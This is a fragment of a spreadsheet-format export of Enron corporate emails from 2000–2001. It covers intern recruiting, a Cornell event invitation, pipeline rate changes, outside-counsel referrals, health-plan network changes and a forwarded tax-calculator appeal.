Miska/GCO/Enron@ENRON, Barbara Lewis/HOU/ECT@ECT, Monica _x000D_
Jackson/Corp/Enron@ENRON, Michelle Zhang/HOU/ECT@ECT, Paul _x000D_
Bieniawski/Corp/Enron@ENRON, Melinda Gallishaw/OTS/Enron@ENRON, Lori _x000D_
Hope/HOU/ECT@ect, Jana Mills/HOU/ECT@ECT, John Peyton/HOU/ECT@ECT, Keith _x000D_
MacIvor/Corp/Enron@ENRON, Justin Rostant/HOU/ECT@ECT, Rhonda _x000D_
Washington/HOU/ECT@ECT, Alexia O Pearce/HOU/ECT@ECT, Jin Guo/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Memo and Presentation from Brian Redmond_x000D_
_x000D_
Please see the attached:_x000D_
_x000D_
_x000D_
                          _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 00:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ryan.ruppert@exxonmobil.com'})</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'lauragammell@hotmail.com', 'eric.gillaspie@enron.com'})</t>
  </si>
  <si>
    <t>Tax Cut</t>
  </si>
  <si>
    <t xml:space="preserve">I can't try this out here at work but maybe you guys are interested...._x000D_
_x000D_
Ryan F. Ruppert_x000D_
Senior Geologist_x000D_
West Texas Geoscience_x000D_
ExxonMobil Production Co._x000D_
_x000D_
396 West Greens Road #603_x000D_
P.O. Box 4697_x000D_
Houston, Texas 77067_x000D_
713.431.1839 Telephone_x000D_
713.431.1510 Facsimile_x000D_
----- Forwarded by Ryan Ruppert/U-Houston/ExxonMobil on 03/08/01 08:12 AM_x000D_
-----_x000D_
_x000D_
                    JUDMANCONY@aol._x000D_
                    com                  To:     Shdeadrick@aol.com, _x000D_
SFlyt@aol.com, e120av8r@yahoo.com,_x000D_
                                           AirDMP@aol.com, _x000D_
ryan.ruppert@exxonmobil.com, ATPFlyer@aol.com_x000D_
                                         cc:_x000D_
                    03/05/01 09:43       Subject:     Tax Cut_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
************  What will the Bush tax cut mean to your family? ***********_x000D_
_x000D_
The Heritage Foundation has analyzed the President's tax relief package and_x000D_
has created a simple mechanism for you to determine quickly how much it_x000D_
would save you in taxes each year._x000D_
_x000D_
Try it out for yourself at: http://www.heritage.org/taxcalculator_x000D_
This Heritage Tax Calculator will allow you to simulate some key elements_x000D_
of_x000D_
President George W. Bush's tax plan and how those tax law changes will_x000D_
affect you. The Calculator shows the savings to taxpayers of the fully_x000D_
phased in proposals by President Bush for marginal rates, the dual earner_x000D_
deduction for married couples, the doubling of the child tax credit to_x000D_
$1,000, and the deductibility of charitable contributions by taxpayers who_x000D_
use the standard deduction. By entering in your income and a few other bits_x000D_
of information, you can quickly get an idea of how much money the_x000D_
President's tax cut plan will save you._x000D_
_x000D_
_x000D_
*************************************************************_x000D_
PLEASE HELP US FIGHT THE TAX RELIEF BATTLE_x000D_
*************************************************************_x000D_
_x000D_
The Heritage Foundation is providing the ammunition that conservatives need_x000D_
to fight this battle.  But we can't do it without your help.  Please_x000D_
support_x000D_
us at this critical moment with your contribution._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Dec 2000 11:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'phillip.allen@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'tim.belden@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'scott.stoness@enron.com'})</t>
  </si>
  <si>
    <t>The Governor cancelled the meeting at the last minute.  Apparently, he was _x000D_
trying to schedule a meeting with Clinton and our meeting conflicted, so we _x000D_
were bumped.  We are trying to set a new time.  I will share with the _x000D_
Governor's energy advisor the information and recommendations all of you _x000D_
helped put together.  Thanks</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 03:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Fw: Mullet: The Power Point Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Ha  Ha Ha.  I forgot.  No need for the attitude though.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	ryan.ruppert@exxonmobil.com_x000D_
	03/02/2001 10:56 AM_x000D_
		 _x000D_
		 To: Gerald.Nemec@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re: FW: Fw: Mullet: The Power Point Presentation_x000D_
_x000D_
_x000D_
_x000D_
Your killing me G.  Attachments get stripped at our firewall.  Show me some_x000D_
of this at home!_x000D_
_x000D_
Ryan F. Ruppert_x000D_
Senior Geologist_x000D_
West Texas Geoscience_x000D_
ExxonMobil Production Co._x000D_
396 West Greens Road #603_x000D_
P.O. Box 4697_x000D_
Houston, Texas 77067_x000D_
713.431.1839 Telephone_x000D_
713.431.1510 Facsimile_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 13:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'charlene.jackson@enron.com'})</t>
  </si>
  <si>
    <t>Re: Hiring Practices for Summer Interns</t>
  </si>
  <si>
    <t xml:space="preserve">Charlene,_x000D_
_x000D_
Thanks for the email.  I have talked with Sally several times on this last=_x000D_
=20_x000D_
couple of days and I understand that OU has a different recruiting schedule=_x000D_
=20_x000D_
then other schools.  Enron is on campus for recruiting in the near future a=_x000D_
nd=20_x000D_
I have asked Sally to tag on some interviews for summer interns while on th=_x000D_
at=20_x000D_
trip.  I believe that she has been able to schedule this so I believe that=_x000D_
=20_x000D_
from an OU perspective it may be a mute point now.  Doing that should be ab=_x000D_
le=20_x000D_
to maintain the momentum that we have developed at OU and all the work Lexi=_x000D_
=20_x000D_
has done.  By the way, the recruiting trip a couple of weeks ago was very=_x000D_
=20_x000D_
successful._x000D_
_x000D_
If you have any other questions or comments please let me know._x000D_
_x000D_
mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Charlene Jackson@ENRON_x000D_
10/05/2000 06:34 AM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc: Celeste Roberts/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON, Mike=20_x000D_
McConnell/HOU/ECT@ECT=20_x000D_
Subject: Re: Hiring Practices for Summer Interns =20_x000D_
_x000D_
Sally,_x000D_
_x000D_
Thanks for the e-mail regarding summer interns.  I apologize that Lexi and=_x000D_
=20_x000D_
Shelly were unable to provide you with the answers you were seeking.  I wis=_x000D_
h=20_x000D_
that you had contacted either Celeste or me to indicate that you were havin=_x000D_
g=20_x000D_
difficulty.  I have personally assured you on several occasions that I was=_x000D_
=20_x000D_
available to either speak with you or meet with you if for some reason any=_x000D_
=20_x000D_
member of my staff was not responsive.  That being said please allow me to=_x000D_
=20_x000D_
explain the recruiting strategy since I was instrumental in helping to set =_x000D_
it._x000D_
_x000D_
You are absolutely correct.  It is great to do market research if time=20_x000D_
permits or it is regarding an issue of which we have little knowledge.  As=_x000D_
=20_x000D_
you are aware, over the past year we have engaged a professional recruiting=_x000D_
=20_x000D_
firm (Brecker &amp; Merryman) who has assisted us in a number of different mark=_x000D_
et=20_x000D_
research projects.  However, in my opinion, this issue is not one that=20_x000D_
required much research.  I have been involved in recruiting in some way,=20_x000D_
shape or form at both the graduate and undergraduate level for the past 10=_x000D_
=20_x000D_
years.  Most major organizations, with the exception of the Accounting firm=_x000D_
s,=20_x000D_
begin the summer intern recruiting process in early spring.  There are=20_x000D_
actually some universities that do not allow recruitment of summer interns=_x000D_
=20_x000D_
until after a certain date, particularly in the MBA programs.  For example,=_x000D_
=20_x000D_
Harvard does not allow an organization to come on campus and speak to first=_x000D_
=20_x000D_
year students until January.  As indicated, the firms that generally recrui=_x000D_
t=20_x000D_
in the fall are the Accounting firms and they are primarily recruiting for=_x000D_
=20_x000D_
"spring" internships._x000D_
_x000D_
The recruiting strategy at Enron is no different this year than it was last=_x000D_
=20_x000D_
year with respect to summer interns.   Presentations were made in January &amp;=_x000D_
=20_x000D_
February and offers were made in February and March.  The only school that=_x000D_
=20_x000D_
did not follow the normal process was OU under the direction of George Hope=_x000D_
. =20_x000D_
We did, of course, recruit summer interns in the fall for the tax group=20_x000D_
because they are competing directly with the Accounting Firms._x000D_
_x000D_
Utilizing this strategy did not impair Enron=01,s ability to hire quality s=_x000D_
ummer=20_x000D_
interns.  This past summer Enron had 76 summer Analysts (undergraduate) and=_x000D_
=20_x000D_
40 summer Associates (graduate).  We intentionally limited the number of=20_x000D_
summer hires to ensure that the individuals hired received meaningful=20_x000D_
assignments.  Approximately 85% of these individuals received permanent=20_x000D_
offers to join Enron.  =20_x000D_
_x000D_
The reason Enron has not had a problem recruiting quality undergraduate=20_x000D_
summer interns is primarily because many organizations do not hire=20_x000D_
undergraduates for summer positions.  They generally focus on MBAs,=20_x000D_
particularly the investment banks and consulting firms which are the firms=_x000D_
=20_x000D_
that Jeff Skilling identifies as Enron's competitors.  Because the=20_x000D_
undergraduates are not actively recruited by our competition we have=20_x000D_
continued to have a special focus on these individuals (i.e. the reason the=_x000D_
re=20_x000D_
were 76 undergraduates and only 40 MBAs)._x000D_
_x000D_
With respect to OU and UT specifically since those were the schools about=_x000D_
=20_x000D_
which you raised a concern, let me address your concerns.  In your e-mail y=_x000D_
ou=20_x000D_
indicated that you had research conducted at UT and OU.  You did not howeve=_x000D_
r,=20_x000D_
provide the results of the research or the person to whom they had spoken=_x000D_
=20_x000D_
therefore I had Lexi Elliott contact both UT and OU._x000D_
_x000D_
While OU has not gotten back to her, following is the information obtained=_x000D_
=20_x000D_
from UT._x000D_
_x000D_
o The contact at UT Career Services is Cindy Henson. =20_x000D_
o According to Cindy, approximately 5% of companies actively recruiting on=_x000D_
=20_x000D_
campus conduct interviews in the fall for "summer" internships.  Cindy=20_x000D_
attributes  this to the fact that these companies cannot come in the spring=_x000D_
,=20_x000D_
or, in the case of Andersen Consulting, have a tremendous need and conduct=_x000D_
=20_x000D_
all interviews  at one time. =20_x000D_
o In conclusion, Cindy estimated that 95% of companies actively recruiting =_x000D_
on=20_x000D_
campus recruit in the spring for summer internships._x000D_
_x000D_
We have not received information from OU therefore I am unable to provide t=_x000D_
he=20_x000D_
statistics at this time.  I will provide as soon as I am in receipt of such=_x000D_
=20_x000D_
information. =20_x000D_
_x000D_
It appears that the information your source obtained is considerably=20_x000D_
different than what we were told.  If you would provide the name of the=20_x000D_
individual to whom they spoke I will follow up to determine the reason for=_x000D_
=20_x000D_
the discrepancies._x000D_
_x000D_
While I understand your concern with respect to OU, they appear to be=20_x000D_
different than most of the other schools at which we recruit.  If you belie=_x000D_
ve=20_x000D_
that it is critical to recruit summer interns at OU in the fall we are=20_x000D_
supportive; however, because Lexi has other school interviews that are=20_x000D_
already scheduled she will not be in a position to facilitate the interview=_x000D_
=20_x000D_
process during the trip you have scheduled currently.  As you are aware, in=_x000D_
=20_x000D_
most instances, the dates for presentations and interviews are dictated by=_x000D_
=20_x000D_
the respective universities and were secured in early August. If you would=_x000D_
=20_x000D_
like for her to try and secure an interview schedule for a later date this=_x000D_
=20_x000D_
fall she can certainly work with your schedule and her current schedule to=_x000D_
=20_x000D_
support your efforts._x000D_
_x000D_
I hope this has been helpful.  I can understand and appreciate your=20_x000D_
frustration if you are not getting answers from the recruiter or her=20_x000D_
manager.  Again, I offer that I am available and willing to work with you i=_x000D_
f=20_x000D_
you are having difficulty with members of the Program staff. =20_x000D_
_x000D_
Please let me know what you decide about recruiting this fall for summer=20_x000D_
interns and whether I can be of any additional assistance._x000D_
_x000D_
Charlene_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 09:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Cornell</t>
  </si>
  <si>
    <t xml:space="preserve">Ken\Rosalie,_x000D_
_x000D_
I will find out the timing of this event.  Thank you for your consideration._x000D_
_x000D_
Kevin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kenneth Lay@ENRON_x000D_
	Sent by: Rosalee Fleming@ENRON_x000D_
	12/11/00 02:39 PM_x000D_
		_x000D_
		 To: Kevin Hannon/Enron Communications@ENRON COMMUNICATIONS_x000D_
		 cc: Sherri Sera/Corp/Enron@ENRON, Carol Ann Brown/Enron Communications@Enron _x000D_
Communications_x000D_
		 Subject: Re: Cornell_x000D_
_x000D_
Ken wanted me to let you know that he has something in Austin the night _x000D_
before and wanted to find out what time the event in Cornell begins._x000D_
_x000D_
Rosie_x000D_
_x000D_
_x000D_
_x000D_
Kevin Hannon@ENRON COMMUNICATIONS on 11/29/2000 08:51:27 AM_x000D_
To: Kenneth Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON_x000D_
cc: Rosalee Fleming/Corp/Enron@ENRON, Sherri Sera/Corp/Enron@ENRON, Carol Ann _x000D_
Brown/Enron Communications@Enron Communications _x000D_
Subject: Cornell_x000D_
_x000D_
Ken and Jeff,_x000D_
_x000D_
As I think you both know I have been active in recruiting at Cornell for the _x000D_
Enron Associate program for several years now.  I also recently have become _x000D_
involved with something called the Park Leadership Fellowship Board which _x000D_
provides scholarships and forums to discuss business leadership issues.  They _x000D_
are holding a pretty prominent event called Leadership week which will _x000D_
include the business heads of Corning and American Express discussing their _x000D_
company's strategies for defining leadership in business today.  I hate to _x000D_
ask you guys to do things like this but it is a pretty big event and would _x000D_
really highlight Enron's recognition of Cornell as being a "Core School" in _x000D_
the MBA recruiting process.  The event as outlined below is scheduled for _x000D_
March 28th.  I appreciate your consideration._x000D_
_x000D_
Kevin_x000D_
_x000D_
----- Forwarded by Kevin Hannon/Enron Communications on 11/29/00 08:38 AM _x000D_
-----_x000D_
_x000D_
	ras22@cornell.edu_x000D_
	11/29/00 06:19 AM_x000D_
		 _x000D_
		 To: Kevin Hannon/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
Kevin-_x000D_
_x000D_
_x000D_
Just a quick follow-up on my November 2 email regarding Enron's_x000D_
participation in the Johnson School's March Leadership Week and the_x000D_
possibility of doing a case study on Enron.  Wondered if you have had a_x000D_
chance to float these ideas with Jeff or Ken?  I know you have lots on_x000D_
you plate.  Let me know if you have any sense of how this might go. _x000D_
Below is the earlier email I sent to you.  Thanks for the help.  Hope all_x000D_
is well with you._x000D_
_x000D_
_x000D_
            Nov.2 email text_x000D_
_x000D_
_x000D_
We at Cornell's Johnson School would like to establish a stronger link_x000D_
with Enron, a company which we believe to be a leading example of the_x000D_
agile organization which will dominate in the dynamic, unpredictable_x000D_
markets of the next decade.  One connecting point which we would like_x000D_
Enron to consider is with our Center for Leadership in Dynamic_x000D_
Organizations which draws faculty and students from across Cornell and_x000D_
beyond._x000D_
_x000D_
_x000D_
The specific activities that we propose at this point in time are two. _x000D_
First, we would like to invite a senior leader from Enron to be a key_x000D_
speaker at the Johnson School's Leadership Week in March, 2001.  As_x000D_
described in the attached materials, Leadership Week is made up of three_x000D_
conferences focused on academic faculty, leading-edge corporations and_x000D_
students.  We very much would like Enron to present what we call a "live_x000D_
case study" at the corporate conference on &lt;underline&gt;March 28,_x000D_
2001&lt;/underline&gt;._x000D_
_x000D_
_x000D_
You, of course, are an obvious candidate to do this.  Alternatively, this_x000D_
is the kind of event that is made to order for Jeff Skilling or Ken Lay_x000D_
and would give them a chance to interact with other corporate leaders and_x000D_
the Cornell community.  Other corporate leaders we have signed up for the_x000D_
corporate conference are John Loose, President and COO of Corning, Ken_x000D_
Chenault, incoming CEO of American Express, Marty Coyne, just announced_x000D_
President of Kodak's new Commercial Group.  Each of these leaders has a_x000D_
distinct message to deliver about the leadership challenges involved in_x000D_
continually reinventing themselves in a fast-changing marketplace.  _x000D_
_x000D_
_x000D_
We have several other speakers lined up for other parts of Leadership_x000D_
Week, including Ken Blanchard and, we think, Abbey Cohen from Goldman_x000D_
Sachs.  We have some chance of getting Bill Ford from Ford Motor Company_x000D_
and an outside shot at Jack Welch through our President Emeritus Frank_x000D_
Rhodes, but these are still long shots._x000D_
_x000D_
_x000D_
The point is that this is the biggest thing that will happen at the_x000D_
Johnson School and probably at Cornell next year.  If Jeff or Ken wanted_x000D_
a platform for telling the Enron story, this would be a good one.  If_x000D_
they can't do it, hopefully we could convince you to do it.  Again, the_x000D_
date is March 28, 2001.       _x000D_
_x000D_
_x000D_
The second proposal is to develop a teaching case on Enron along the same_x000D_
lines.  In fact, if we started working on the teaching case soon, it_x000D_
could become the basis for the March conference live case study_x000D_
presentation.  We believe that Enron is unique in its ability to_x000D_
literally create new markets.  The question is how do you lead and manage_x000D_
an organization to keep the tight financial and risk controls in place_x000D_
that you do, but still create the entrepreneurial behavior that seems to_x000D_
be the case at Enron.  What kind of management philosophies, systems and_x000D_
practices make this possible._x000D_
_x000D_
_x000D_
I know that Enron was the subject of two Harvard cases in 1993 and around_x000D_
1997.  As I understand it neither focused on organizational and_x000D_
leadership issues.  We would like to devote a small research team to_x000D_
building this case about Enron, directed by myself and Professor Lee Dyer_x000D_
from the ILR School.  We would need access to a number of people in the_x000D_
Enron organization, but are very aware of the demands on time for fast_x000D_
moving organizations and are committed to doing this in a very efficient_x000D_
way._x000D_
_x000D_
_x000D_
Kevin, we appreciate your willingness to entertain these two ideas and_x000D_
hopefully test them with your top leaders.  We will do anything we can to_x000D_
make it feasible for Enron to engage with us on these two initiatives. _x000D_
Please let me know what I can do to help you carry this forward.  As_x000D_
always, thanks for your great personal support._x000D_
_x000D_
_x000D_
Dick_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 08:40:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.vickers@enron.com', 'victoria.versen@enron.com', 'michael.pritchard@enron.com', 'judy.townsend@enron.com', 'w..pereira@enron.com', 'brad.mckay@enron.com', 'scott.goodell@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'chris.ordway@enron.com', 'craig.taylor@enron.com', 'clarissa.garcia@enron.com', 'robert.allwein@enron.com', 'jonathan.mckay@enron.com', 'leonidas.savvas@enron.com', 'f..keavey@enron.com', 'vladi.pimenov@enron.com', 'shanna.boudreaux@enron.com', 'meredith.homco@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'maureen.smith@enron.com', 'f..brawner@enron.com', 'john.hodge@enron.com'})</t>
  </si>
  <si>
    <t>FW: TETCO ASA and Global Settlement Filing Effective 12/1/01</t>
  </si>
  <si>
    <t>Subject:	TETCO ASA and Global Settlement Filing Effective 12/1/01_x000D_
_x000D_
November 8, 2001_x000D_
_x000D_
_x000D_
To: S-2 Customers_x000D_
_x000D_
Re: TETCO ASA and Global Settlement Filing Effective 12/1/01_x000D_
_x000D_
On October 31, 2001 Texas Eastern Transmission Corporation _x000D_
(TETCO) filed its annual Applicable Shrinkage Adjustment (ASA) _x000D_
and its final Order No. 636 Transition Cost filing in Docket No. _x000D_
RP02-36-0000.  Included in the filing were revised rates and ASA _x000D_
percentages designed to retain in-kind the projected quantities _x000D_
of gas required for the operation of TETCO's system, including _x000D_
percentages under Rate Schedule X-28 which Transco utilizes to _x000D_
render service under its Rate Schedule S-2.  The revised rates _x000D_
and fuel percentages have a proposed effective date of December _x000D_
1, 2001, and if accepted as proposed would result in the _x000D_
following changes in Transco's Rate Schedule S-2 rates and fuel _x000D_
percentages: _x000D_
_x000D_
Injection Rate - $0.0020 decrease_x000D_
Withdrawal Rate - $0.0048 decrease_x000D_
Injection Fuel Percentage - 0.08% decrease_x000D_
Inventory Level Fuel Percentage - 0.02% decrease_x000D_
Withdrawal Fuel Percentages:_x000D_
     Winter Period - 0.03% increase_x000D_
     Spring, Summer and Fall Periods - 0.09% decrease_x000D_
_x000D_
Please refer any questions to Mike Heeney, Rate Department, at _x000D_
(713)215-2424._x000D_
_x000D_
Ann Taylor_x000D_
713-215-2045_x000D_
Customer Service</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 22:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EFF_DT PORTFOLIO_ID DOWN95_x000D_
1/16/01  MANAGEMENT-COAL 2,948._x000D_
1/16/01  MANAGEMENT-CRD 32,404_x000D_
1/16/01  MANAGEMENT-GAS 185,483_x000D_
1/16/01  MANAGEMENT-PWR 186,963._x000D_
1/16/01  AGG-MANAGEMENT 226,899.</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'harry.collins@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I have nothing working with them!_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	07/13/2000 04:26 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT, _x000D_
David Portz/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marie Heard/Enron _x000D_
Communications@Enron Communications, Robbi Rossi/Enron Communications@Enron _x000D_
Communications_x000D_
		 cc: _x000D_
		 Subject: Allegheny Energy_x000D_
_x000D_
One of the online team is looking for someone from Legal who is working with _x000D_
(read "holding up things with") the Allegheny Energy people right now.  Any _x000D_
of you got anything going on?_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 11:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Discovery document</t>
  </si>
  <si>
    <t>Please schedule ameeting w/ me, Randy Maffett, Roland Tellis at Milbank and _x000D_
Steve Hamilton at Ecogas(if Randy says we need him) to discuss the Waste _x000D_
Management case_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 09/28/2000 06:29 PM -----_x000D_
_x000D_
	Randal Maffett_x000D_
	09/26/2000 10:18 AM_x000D_
		_x000D_
		 To: Steven Hamilton &lt;steve@ecogas.com&gt; @ ENRON_x000D_
		 cc: kelly@ecogas.com, Richard B Sanders/HOU/ECT@ECT_x000D_
		 Subject: Re: FW: Discovery document_x000D_
_x000D_
I spoke w/ Richard Sanders in our litigation group and he's trying to _x000D_
schedule a call w/ Milbank Tweed later today.  Will keep you posted.</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 02:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Illinois Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">FYI:  another instance of  work being sent directly to outside counsel.  In _x000D_
this case it was an additional assignment related to an ongoing project._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/12/2001 10:19 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
02/12/2001 09:24 AM_x000D_
To: Fred Mitro/HOU/ECT@ECT_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: Illinois Agreements  _x000D_
_x000D_
Fred,_x000D_
_x000D_
When you need something for a project, please come to me first (or whoever _x000D_
might be the appropriate ENA lawyer).  Going directly to the outside lawyer _x000D_
creates problems. For instance, it is Enron policy that we do  not pay _x000D_
outside counsel for work not referred to them by an ENA lawyer.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
02/09/2001 05:26 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Illinois Agreements_x000D_
_x000D_
Kay:_x000D_
_x000D_
Details on the two Agreements Rusty mentioned in his Pontiac presentation are _x000D_
as follows:_x000D_
_x000D_
1.  Tax Assessment Letter - Livingston County personell (Pontiac site) have _x000D_
requested that Titan LLC enter into a tax assessment agreement related to the _x000D_
Project.  Mark Gershon (Piper Rudnick) is preparing a draft letter for the _x000D_
County using the Assessment Agreement form utilized in our Kendall County _x000D_
Special Use Permit as a template and based upon discussions between myself, _x000D_
Rusty, Mark, and Warren Schick/Robert Tillota of ENA's tax department.  Mark _x000D_
will forward a draft of this letter to us for review/comment before we submit _x000D_
it to Livingston County.  Please co-ordinate with Mark directly in order to _x000D_
minimize the outside legal costs of this Agreement._x000D_
_x000D_
2.  ComEd Interconnection Agreement - ComEd recently (1/30/01) sent me their _x000D_
boilerplate draft Interconnection Agreement (IA) for the Kendall LLC and _x000D_
Titan LLC projects.  Under ComEd's tariff we have 90 days to execute the IA _x000D_
in order to maintain our position(s) in ComEd's interconnection queue.  I _x000D_
have told ComEd that we would likely modify their boilerplate IA to make it _x000D_
resemble the IA signed by ENA and ComEd in Q2 2000 on the Des Plaines LLC _x000D_
project in Will County, Illinois.  My preference would be to wait a few weeks _x000D_
on starting negotiations on either IA so that we can attempt to finalize a _x000D_
sale of member interests with either  PSEG or Entergy.  If you would like to _x000D_
see the ComEd boilerplate IA, let me know and I will forward it to you._x000D_
_x000D_
Call me to discuss._x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Fred Mitro/HOU/ECT on 02/09/2001 03:07 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rusty Stevens@ENRON_x000D_
02/09/2001 02:14 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Fred Mitro/HOU/ECT@ECT _x000D_
Subject: Re:  _x000D_
_x000D_
Actually, Fred and I worked on Pontiac together, and he handled the Com-Ed _x000D_
correspondence._x000D_
_x000D_
Fred ?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
02/09/2001 01:31 PM_x000D_
To: Rusty Stevens/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
In your presentation today you mentioned an assessment agreement and an _x000D_
interconnection agreement.  Roger says he isn't working on it.  Who in Legal _x000D_
is handling those docs?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 14:44:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.bridges@enron.com'})</t>
  </si>
  <si>
    <t>FW: Term Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Get a load of this...I think we should pull all the Valtech cards._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Martin Santora &lt;martin.santora@valtech.com&gt;@ENRON [mailto:IMCEANOTES-Martin+20Santora+20+3Cmartin+2Esantora+40valtech+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, May 04, 2001 4:11 PM_x000D_
To:	Bridges, Michael_x000D_
Subject:	Term Sheet_x000D_
_x000D_
 - Enron Term Sheet.doc </t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 13:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Important Information About United HealthCare - Please Read!</t>
  </si>
  <si>
    <t>TO: Houston Area Employees Participating in the Domestic Medical Plan Benefits_x000D_
_x000D_
You may have recently received communication from United HealthCare (UHC) _x000D_
concerning Memorial Hermann Health Systems' (MHHS) decision to terminate _x000D_
their contract with UHC  in the Houston/Beaumont area.  This communication _x000D_
also included the names of physicians who will be dropped from the network _x000D_
due to this action.  It is our intent to help you understand the situation._x000D_
_x000D_
It is our understanding that Memorial Herman Health Systems asked for a 40% _x000D_
increase in fees - a substantial increase that would have been passed on to _x000D_
you and Enron!  When United HealthCare attempted to negotiate with a counter _x000D_
proposal, Memorial Hermann cancelled their contract._x000D_
_x000D_
While this contractual arrangement was between the hospital system and UHC, _x000D_
Enron continues to support UHC in their ongoing contract negotiation _x000D_
efforts.  At this time, it is only UHC which has been affected, however, it _x000D_
is our understanding that Cigna has also been contacted by the hospital group _x000D_
and may be in contract negotiations at this time as well.  _x000D_
_x000D_
Many doctors have obtained admission privileges to other area hospitals _x000D_
within the UHC Network or have contracted directly with UHC including those _x000D_
with admission privileges to The Woodlands, Sugarland and Clear Lake _x000D_
Hospitals, to name a few.  In a further effort to limit disruption to our _x000D_
affected employees and families who are enrolled in the UHC Network or EPO _x000D_
options, Enron has authorized UHC to process claims incurred between _x000D_
September 28 and December 31, 2000 as if the termination of the Memorial _x000D_
Hermann Health Systems from the network had not occurred and In-Network _x000D_
benefits applied.  Office visits will have a $10 copayment and all other _x000D_
charges will be covered at 90%.  Hospital admissions will still need to be _x000D_
pre-certified with UHC._x000D_
_x000D_
These steps have decreased the number of participants' affected by Primary _x000D_
Care Physician disruption from 1,050 to 127._x000D_
_x000D_
If You Need Medical Attention:  You or your doctor/hospital must call UHC's _x000D_
customer service number so proper benefits can be verified.  In some cases _x000D_
the hospital or doctor may request payment at the time service is performed.  _x000D_
If this should happen, please obtain an itemized statement and submit it to _x000D_
UHC with a claim form for prompt reimbursement.  Claim forms can be obtained _x000D_
by calling 1-800-332-7979 or in Houston at 713-853-7979 ( press 1)._x000D_
_x000D_
Open enrollment materials will be coming soon.  Take this opportunity to _x000D_
consider your elections for 2001.  _x000D_
_x000D_
United HealthCare and Enron HR are committed to assisting Enron employees _x000D_
through this transition.  We will communicate any  further developments that _x000D_
may impact you or your family.</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 03:18:00 -0700 (PDT)</t>
  </si>
  <si>
